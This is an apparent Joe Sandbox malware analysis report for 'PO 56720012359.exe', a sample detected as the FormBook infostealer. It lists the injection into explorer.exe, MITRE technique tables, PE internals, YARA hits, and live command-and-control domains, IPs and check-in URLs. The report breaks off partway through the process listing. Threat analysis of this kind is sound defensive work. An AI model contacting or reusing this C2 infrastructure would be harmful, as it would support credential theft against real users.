          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

          [Figure: Behavior Graph ID: 483537; Sample: PO 56720012359.exe; Startdate: 15/09/2021; Architecture: WINDOWS; Score: 100. Process chain: PO 56720012359.exe started PO 56720012359.exe and conhost.exe; the second PO 56720012359.exe injected explorer.exe; explorer.exe started cscript.exe; cscript.exe started cmd.exe; cmd.exe started conhost.exe.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          PO 56720012359.exe | 51% | Virustotal |
          PO 56720012359.exe | 40% | ReversingLabs | Win32.Trojan.Brresmon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.2.PO 56720012359.exe.2d10000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.2.PO 56720012359.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          healthy-shack.com | 0% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.mobilewz.com | 23.252.68.226 | true | true | | unknown
          www.fmodesign.com | 154.81.100.18 | true | true | | unknown
          healthy-shack.com | 107.180.44.148 | true | true | | unknown
          www.allfyllofficial.com | 50.87.144.47 | true | true | | unknown
          www.stuntfighting.com | 156.252.96.170 | true | true | | unknown
          www.la-bio-geo.com | unknown | unknown | true | | unknown
          www.healthy-shack.com | unknown | unknown | true | | unknown
          www.arerasols.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.stuntfighting.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=0cNTwCf3GfppWKB0T1XESIgtEFKjNX2tylJLJaVzm8N2XRqnUHRn8w7/tpdMCfw1z2P+ | true | Avira URL Cloud: safe | unknown
          http://www.fmodesign.com/b6cu/?L8fhOFRP=v4/7wB6X+ne64BMfzkTnNfrtxR+fNWuSRi8sP9TYFcLz2AIA8KGD8NWIHbMwW3JjWqpf&y2=_npT80v0M2 | true | Avira URL Cloud: safe | unknown
          www.allfyllofficial.com/b6cu/ | true | Avira URL Cloud: malware | low
          http://www.healthy-shack.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries


                        Contacted IPs

                        Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 156.252.96.170 | www.stuntfighting.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true |
| 154.81.100.18 | www.fmodesign.com | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true |
| 107.180.44.148 | healthy-shack.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true |
| 23.252.68.226 | www.mobilewz.com | Turkey | 59447 | SAYFANETTR | true |

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:483537
                        Start date:15.09.2021
                        Start time:08:34:10
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 24s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:PO 56720012359.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:26
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@8/0@8/5
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 30.6% (good quality ratio 28.4%)
                        • Quality average: 78.3%
                        • Quality standard deviation: 29.5%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 86
                        • Number of non-executed functions: 169
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 20.82.209.183, 40.112.88.60, 20.50.102.62, 23.216.77.209, 23.216.77.208
                        • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                        • Not all processes were analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| 154.81.100.18 | SOA.exe | malicious | www.fmodesign.com/b6cu/?2dpHPlu=v4/7wB6X+ne64BMfzkTnNfrtxR+fNWuSRi8sP9TYFcLz2AIA8KGD8NWIHYsgZWZbIPAY&I2Jh=qZzPvfA0dTw |
| 23.252.68.226 | vbc.exe | malicious | |

                          Domains

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| www.stuntfighting.com | New Order.exe | malicious | 156.252.96.170 |
| www.allfyllofficial.com | vbc.exe | malicious | 50.87.144.47 |
| | USD INV#1191189.xlsx | malicious | 50.87.144.47 |
| | New Order.exe | malicious | 50.87.144.47 |
| | SOA.exe | malicious | 50.87.144.47 |
| www.mobilewz.com | vbc.exe | malicious | 23.252.68.226 |
| www.fmodesign.com | SOA.exe | malicious | 154.81.100.18 |

                          ASN


                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (console) Intel 80386, for MS Windows
                          Entropy (8bit):7.763697037341853
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:PO 56720012359.exe
                          File size:304128
                          MD5:839c75a88734aaf014ef0c3d77ce9109
                          SHA1:10d79cb8e51fd30bfff63b2465ba0e111f6dd500
                          SHA256:1829af596150521350d812c07f81226755d397e4755f649e083cc06de7d6f402
                          SHA512:e6feddaf0616f781a8d9de9fd68e78654c2be2c1e5bff676fc4d78de7ca6f8f6cace5245117d7554c4f50452c6d7d60ab5a62d1f66580ed8707ec835d91cc551
                          SSDEEP:6144:z9GBfOEiU6y+B0yoP9/NbU2Q2QNW7rdmtJJTbutFB1:zgBmEiU6/aF/Ja2oW/dmtJwTB1
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ivc.-...-...-... E..5... E.."... E..H...9|..>...-...X....I..,....I..,....I..,...Rich-...........................PE..L...[SAa...

                          File Icon

                          Icon Hash:4f050d0d0d054f90

                          Static PE Info

                          General

                          Entrypoint:0x4029fb
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows cui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x6141535B [Wed Sep 15 01:58:51 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:c2e2fa89aec204ac5f3945ce98025d14

                          Entrypoint Preview

                          Instruction
                          call 00007FDFFCC68396h
                          jmp 00007FDFFCC67210h
                          push ebp
                          mov ebp, esp
                          mov eax, dword ptr [ebp+08h]
                          mov eax, dword ptr [eax]
                          cmp dword ptr [eax], E06D7363h
                          jne 00007FDFFCC673B7h
                          cmp dword ptr [eax+10h], 03h
                          jne 00007FDFFCC673B1h
                          mov eax, dword ptr [eax+14h]
                          cmp eax, 19930520h
                          je 00007FDFFCC673ADh
                          cmp eax, 19930521h
                          je 00007FDFFCC673A6h
                          cmp eax, 19930522h
                          je 00007FDFFCC6739Fh
                          cmp eax, 01994000h
                          je 00007FDFFCC67398h
                          xor eax, eax
                          pop ebp
                          retn 0004h
                          call 00007FDFFCC68684h
                          int3
                          push 00402A05h
                          call 00007FDFFCC68A35h
                          pop ecx
                          xor eax, eax
                          ret
                          push ebp
                          mov ebp, esp
                          push esi
                          call 00007FDFFCC67634h
                          mov esi, eax
                          test esi, esi
                          je 00007FDFFCC674DBh
                          mov edx, dword ptr [esi+5Ch]
                          mov ecx, edx
                          push edi
                          mov edi, dword ptr [ebp+08h]
                          cmp dword ptr [ecx], edi
                          je 00007FDFFCC6739Fh
                          add ecx, 0Ch
                          lea eax, dword ptr [edx+00000090h]
                          cmp ecx, eax
                          jc 00007FDFFCC67381h
                          lea eax, dword ptr [edx+00000090h]
                          cmp ecx, eax
                          jnc 00007FDFFCC67396h
                          cmp dword ptr [ecx], edi
                          je 00007FDFFCC67394h
                          xor ecx, ecx
                          test ecx, ecx
                          je 00007FDFFCC674A6h
                          mov edx, dword ptr [ecx+08h]
                          test edx, edx
                          je 00007FDFFCC6749Bh
                          cmp edx, 05h
                          jne 00007FDFFCC6739Eh
                          and dword ptr [ecx+08h], 00000000h
                          xor eax, eax
                          inc eax
                          jmp 00007FDFFCC6748Bh
                          cmp edx, 01h
                          jne 00007FDFFCC6739Ah
                          or eax, FFFFFFFFh
                          jmp 00007FDFFCC6747Eh

                          Rich Headers

                          Programming Language:
                          • [ C ] VS2015 UPD3.1 build 24215
                          • [C++] VS2013 build 21005
                          • [LNK] VS2015 UPD3.1 build 24215
                          • [ASM] VS2013 build 21005
                          • [ C ] VS2013 build 21005
                          • [RES] VS2015 UPD3 build 24213

                          Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x113bc | 0xc8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x37668 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4e000 | 0xd70 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x10e30 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x10e50 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x1c0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                          Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xb6b6 | 0xb800 | False | 0.581288213315 | data | 6.64409141426 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0xd000 | 0x4dd4 | 0x4e00 | False | 0.389272836538 | data | 4.66913496112 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x12000 | 0x31c4 | 0x1400 | False | 0.319921875 | data | 3.49628246477 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x16000 | 0x37668 | 0x37800 | False | 0.951919693131 | data | 7.9875649034 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x4e000 | 0xd70 | 0xe00 | False | 0.796875 | data | 6.45071133859 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

                          Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| OZX | 0x160f0 | 0x364b8 | data | English | United States |
| RT_ICON | 0x4c5a8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294440951, next used block 4294440951 | English | United States |
| RT_GROUP_ICON | 0x4d650 | 0x14 | data | English | United States |

                          Imports

| DLL | Import |
|---|---|
| KERNEL32.dll | FreeLibrary, GetProcAddress, LoadLibraryExW, lstrcmpiW, lstrcpyW, lstrcatW, lstrlenW, CloseHandle, WriteConsoleW, SetFilePointerEx, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, LCMapStringW, VirtualProtect, GetStringTypeW, HeapReAlloc, OutputDebugStringW, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, LeaveCriticalSection, EnterCriticalSection, GetModuleHandleW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, TerminateProcess, GetCurrentProcess, GetProcessHeap, HeapFree, HeapAlloc, GetLastError, HeapSize, ExpandEnvironmentStringsW, GetCommandLineW, SetLastError, GetCurrentThreadId, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameW, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, CreateFileW |
| MSWSOCK.dll | getnetbyname, SetServiceA, GetAddressByNameA, EnumProtocolsA, rcmd, AcceptEx |
| rtutils.dll | TraceGetConsoleW, TraceVprintfExW, RouterLogEventStringA, RouterLogEventW, TraceDeregisterW, LogEventA |
| MAPI32.dll | |
| WININET.dll | GopherFindFirstFileW, InternetQueryOptionA, InternetHangUp, FindFirstUrlCacheContainerW |
| RPCRT4.dll | NDRSContextMarshall, NdrSimpleStructFree, RpcServerInqBindings, NdrConvert2, NdrNonEncapsulatedUnionBufferSize, NdrConformantArrayUnmarshall |
| SHELL32.dll | ExtractAssociatedIconExA, SHBrowseForFolder |
| USER32.dll | MessageBoxW, GetDC, GrayStringA |
| ADVAPI32.dll | RegQueryValueExW, RegQueryValueExA, RegOpenKeyExW, RegCloseKey, StartServiceCtrlDispatcherW |

                          Possible Origin

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |

                          Network Behavior

                          Snort IDS Alerts

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 09/15/21-08:36:35.041327 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 10.254.0.2 | 192.168.2.5 |
| 09/15/21-08:37:06.463980 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49782 | 80 | 192.168.2.5 | 107.180.44.148 |
| 09/15/21-08:37:06.463980 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49782 | 80 | 192.168.2.5 | 107.180.44.148 |
| 09/15/21-08:37:06.463980 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49782 | 80 | 192.168.2.5 | 107.180.44.148 |
| 09/15/21-08:37:11.792471 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49783 | 80 | 192.168.2.5 | 50.87.144.47 |
| 09/15/21-08:37:11.792471 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49783 | 80 | 192.168.2.5 | 50.87.144.47 |
| 09/15/21-08:37:11.792471 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49783 | 80 | 192.168.2.5 | 50.87.144.47 |

                          TCP Packets


                          UDP Packets


                          DNS Queries

                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                          Sep 15, 2021 08:36:23.043905020 CEST | 192.168.2.5 | 8.8.8.8 | 0x273 | Standard query (0) | www.stuntfighting.com | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:36:29.029289961 CEST | 192.168.2.5 | 8.8.8.8 | 0xc6eb | Standard query (0) | www.fmodesign.com | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:36:34.686691046 CEST | 192.168.2.5 | 8.8.8.8 | 0x237f | Standard query (0) | www.mobilewz.com | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:36:57.868899107 CEST | 192.168.2.5 | 8.8.8.8 | 0xb373 | Standard query (0) | www.mobilewz.com | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:37:00.935902119 CEST | 192.168.2.5 | 8.8.8.8 | 0x38d1 | Standard query (0) | www.arerasols.com | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:37:06.317146063 CEST | 192.168.2.5 | 8.8.8.8 | 0x9590 | Standard query (0) | www.healthy-shack.com | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:37:11.603655100 CEST | 192.168.2.5 | 8.8.8.8 | 0xe92e | Standard query (0) | www.allfyllofficial.com | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:37:17.371459961 CEST | 192.168.2.5 | 8.8.8.8 | 0xbf36 | Standard query (0) | www.la-bio-geo.com | A (IP address) | IN (0x0001)

                          DNS Answers

                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                          Sep 15, 2021 08:36:23.223212957 CEST | 8.8.8.8 | 192.168.2.5 | 0x273 | No error (0) | www.stuntfighting.com |  | 156.252.96.170 | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:36:29.223927021 CEST | 8.8.8.8 | 192.168.2.5 | 0xc6eb | No error (0) | www.fmodesign.com |  | 154.81.100.18 | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:36:34.867702961 CEST | 8.8.8.8 | 192.168.2.5 | 0x237f | No error (0) | www.mobilewz.com |  | 23.252.68.226 | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:36:58.204263926 CEST | 8.8.8.8 | 192.168.2.5 | 0xb373 | No error (0) | www.mobilewz.com |  | 23.252.68.226 | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:37:00.974194050 CEST | 8.8.8.8 | 192.168.2.5 | 0x38d1 | Name error (3) | www.arerasols.com | none | none | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:37:06.347759962 CEST | 8.8.8.8 | 192.168.2.5 | 0x9590 | No error (0) | www.healthy-shack.com | healthy-shack.com |  | CNAME (Canonical name) | IN (0x0001)
                          Sep 15, 2021 08:37:06.347759962 CEST | 8.8.8.8 | 192.168.2.5 | 0x9590 | No error (0) | healthy-shack.com |  | 107.180.44.148 | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:37:11.633694887 CEST | 8.8.8.8 | 192.168.2.5 | 0xe92e | No error (0) | www.allfyllofficial.com |  | 50.87.144.47 | A (IP address) | IN (0x0001)
                          Sep 15, 2021 08:37:17.418663979 CEST | 8.8.8.8 | 192.168.2.5 | 0xbf36 | Name error (3) | www.la-bio-geo.com | none | none | A (IP address) | IN (0x0001)

                          HTTP Request Dependency Graph

                          • www.stuntfighting.com
                          • www.fmodesign.com
                          • www.healthy-shack.com

                          HTTP Packets

                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          0 | 192.168.2.5 | 49774 | 156.252.96.170 | 80 | C:\Windows\explorer.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Sep 15, 2021 08:36:23.518058062 CEST | 4563 | OUT | GET /b6cu/?y2=_npT80v0M2&L8fhOFRP=0cNTwCf3GfppWKB0T1XESIgtEFKjNX2tylJLJaVzm8N2XRqnUHRn8w7/tpdMCfw1z2P+ HTTP/1.1
                          Host: www.stuntfighting.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Sep 15, 2021 08:36:24.016992092 CEST | 4563 | IN | HTTP/1.1 302 Moved Temporarily
                          Server: nginx/1.16.1
                          Date: Wed, 15 Sep 2021 06:36:23 GMT
                          Content-Type: text/html; charset=gbk
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Powered-By: PHP/5.6.40
                          Location: /404.html
                          Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          1 | 192.168.2.5 | 49775 | 154.81.100.18 | 80 | C:\Windows\explorer.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Sep 15, 2021 08:36:29.441050053 CEST | 4564 | OUT | GET /b6cu/?L8fhOFRP=v4/7wB6X+ne64BMfzkTnNfrtxR+fNWuSRi8sP9TYFcLz2AIA8KGD8NWIHbMwW3JjWqpf&y2=_npT80v0M2 HTTP/1.1
                          Host: www.fmodesign.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Sep 15, 2021 08:36:29.654658079 CEST | 4565 | IN | HTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Wed, 15 Sep 2021 06:36:29 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          2 | 192.168.2.5 | 49782 | 107.180.44.148 | 80 | C:\Windows\explorer.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Sep 15, 2021 08:37:06.463979959 CEST | 4587 | OUT | GET /b6cu/?y2=_npT80v0M2&L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz HTTP/1.1
                          Host: www.healthy-shack.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Sep 15, 2021 08:37:06.587517977 CEST | 4588 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Wed, 15 Sep 2021 06:37:06 GMT
                          Server: Apache
                          Location: https://healthy-shack.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz
                          Content-Length: 335
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://healthy-shack.com/b6cu/?y2=_npT80v0M2&amp;L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz">here</a>.</p></body></html>


                          Code Manipulations

                          Statistics

                          CPU Usage


                          Memory Usage


                          High Level Behavior Distribution


                          Behavior


                          System Behavior

                          General

                          Start time:08:35:04
                          Start date:15/09/2021
                          Path:C:\Users\user\Desktop\PO 56720012359.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\Desktop\PO 56720012359.exe'
                          Imagebase:0x8b0000
                          File size:304128 bytes
                          MD5 hash:839C75A88734AAF014EF0C3D77CE9109
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          General

                          Start time:08:35:08
                          Start date:15/09/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:08:35:09
                          Start date:15/09/2021
                          Path:C:\Users\user\Desktop\PO 56720012359.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\Desktop\PO 56720012359.exe'
                          Imagebase:0x8b0000
                          File size:304128 bytes
                          MD5 hash:839C75A88734AAF014EF0C3D77CE9109
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          General

                          Start time:08:35:13
                          Start date:15/09/2021
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff693d90000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:high

                          General

                          Start time:08:35:45
                          Start date:15/09/2021
                          Path:C:\Windows\SysWOW64\cscript.exe
                          Wow64 process (32bit):true
